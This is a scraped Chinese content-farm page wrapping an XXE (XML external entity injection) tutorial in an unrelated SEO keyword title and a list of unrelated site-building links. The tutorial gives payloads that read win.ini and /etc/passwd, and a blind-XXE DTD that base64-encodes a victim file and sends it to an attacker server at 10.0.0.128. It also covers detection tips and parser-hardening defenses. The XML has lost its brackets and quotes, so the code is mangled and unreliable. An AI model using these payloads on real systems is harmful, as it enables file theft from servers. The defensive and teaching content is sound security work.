当前位置: 首页 > news >正文

微信公众平台视频网站开发设计类专业需要艺考吗

微信公众平台视频网站开发,设计类专业需要艺考吗,三合一网站选什么系统,北京工商注册代理1.定义 XML用于标记电子文件使其具有结构性的标记语言#xff0c;可以用来标记数据、定义数据类型#xff0c;是一种允许用户对自己的标记语言进行定义的源语言。XML文档结构包括XML声明、DTD文档类型定义#xff08;可选#xff09;、文档元素。 http://www.w3school.com.…1.定义 XML用于标记电子文件使其具有结构性的标记语言可以用来标记数据、定义数据类型是一种允许用户对自己的标记语言进行定义的源语言。XML文档结构包括XML声明、DTD文档类型定义可选、文档元素。 http://www.w3school.com.cn/dtd/index.asp   了解地址  2.原理     XXEXML外部实体注入) 在应用程序解析XML输入时当允许引用外部实体时可构造恶意内容导致读取任意文件、探测内网端口、攻击内网网站、发起DoS拒绝服务攻击、执行系统命令等。当运维人员使用了低版本php,libxml低于2.9.1或者程序员设置了libxml_disable_entity_loader(FALSE)就可以加载外部实体。      http://10.0.0.139:92/phpinfo.php   ctrl f    搜索输入内容 默认为false 3.XXE攻击 有回显 ?xml version 1.0? !DOCTYPE note [      !ENTITY hacker SYSTEM file:///c:/windows/win.ini ]  namehacker;/name     //定义DTD文件格式为:root指定根节点名称system声明要使用的外部DTD文件路径如!ENTITY 实体名称 SYSTEM URI/URL  win操作系统读出来就是有xxe漏洞   Linux 读/etc/passswd 无回显 建立*.dtd攻击者服务器  !ENTITY % file SYSTEM php://filter/readconvert.base64encode/resourcefile:///c:/1.txt   //被攻击的文件 !ENTITY % int !ENTITY #37; send SYSTEM http://10.0.0.128:80/?p%file;   //内部的%号要进行实体编码成#37    在被攻击机创建1.txt  攻击机使用apache  apache的日志文件里面查看 解码base64  xml调用 !DOCTYPE convert [  !ENTITY % remote SYSTEM http://10.0.0.128:88/test.dtd %remote;%int;%send; ]  4.如何找xxe漏洞   白盒测试         查看代码里面是否使用了LoadXML( )函数     黑盒测试         抓包看响应体是否存在xml,accept头是否接受xml         抓包修改数据类型把json改成xml来传输数据后面修改一句话         http://web.jarvisoj.com:9882/   例子          出来的样子            json的数据提交            改为xml,下面改为  ?xml version 1.0? !DOCTYPE note [      !ENTITY hacker SYSTEM file:///etc/passwd ] namehacker;/name    打比赛的ctf地址  特征             看到url文件名是否 .ashx后缀扩展名             响应体为xml                  5.防范方法 1、升级php版本 2、程序员修改代码  PHP libxml_disable_entity_loader(true); JAVA: DocumentBuilderFactory dbf DocumentBuilderFactory.newInstance(); dbf.setExpandEntityReferences(false); setFeature(http://apache.org/xml/features/disallow-doctype-decl,true); setFeature(http://xml.org/sax/features/external-general-entities,false) setFeature(http://xml.org/sax/features/external-parameter-entities,false); Python from lxml import etree xmlData etree.parse(xmlSource,etree.XMLParser(resolve_entitiesFalse)) 3、过滤关键词 !DOCTYPE、!ENTITY SYSTEM、PUBLIC
http://www.zqtcl.cn/news/744785/

相关文章:

  • 外贸怎样做网站临汾花果街网站建设
  • 专业集团门户网站建设方案南昌医院网站建设
  • 用php做美食网站有哪些新建网站如何做关键词
  • 企业网站建设招标微信公众平台官网登录入口网页版
  • 网站宣传图网站程序预装
  • 网站设计论文选题seo排名优化推广报价
  • wordpress图床网站百度链接收录
  • 八年级信息网站怎么做电商网站的支付接入该怎么做呢
  • wordpress 的应用大兴安岭地网站seo
  • 网站建站作业做直播网站赚钱
  • 网站建设虍金手指花总简单免费制作手机网站
  • 京东网站是刘强冬自己做的吗献县网站建设价格
  • 余姚什么网站做装修比较好邢台企业做网站哪儿好
  • 网站建设后端国外购物平台排行榜前十名
  • 西安做百度推广网站 怎样备案简述商务网站建设
  • 如何建设本地网站东莞常平限电通知2021
  • 成都网站建设cdajcx重庆推广网站排名价格
  • 建网站的价格网店设计方案计划书
  • 长沙做公司网站如何制作个人网站教程
  • 做一个网站怎么做的仿qq网站程序
  • 曲靖市建设局网站官网织梦可以放两个网站
  • 网站建设方案ppt模板网站怎么做用户登录数据库
  • 做3d图的网站有哪些软件有哪些专业设计企业网站
  • 青海省wap网站建设公司做美工比较好的网站
  • 1个云虚拟主机怎么做多个网站网站规划与建设实验心得
  • led视频网站建设公众号代运营平台
  • 北京微信网站开发费用软件开发做平台
  • 平面设计师必备网站精湛的赣州网站建设
  • 上海市住房和城乡建设部网站官网wordpress页面点赞
  • 试玩平台类网站怎么做的东莞网站关键词推广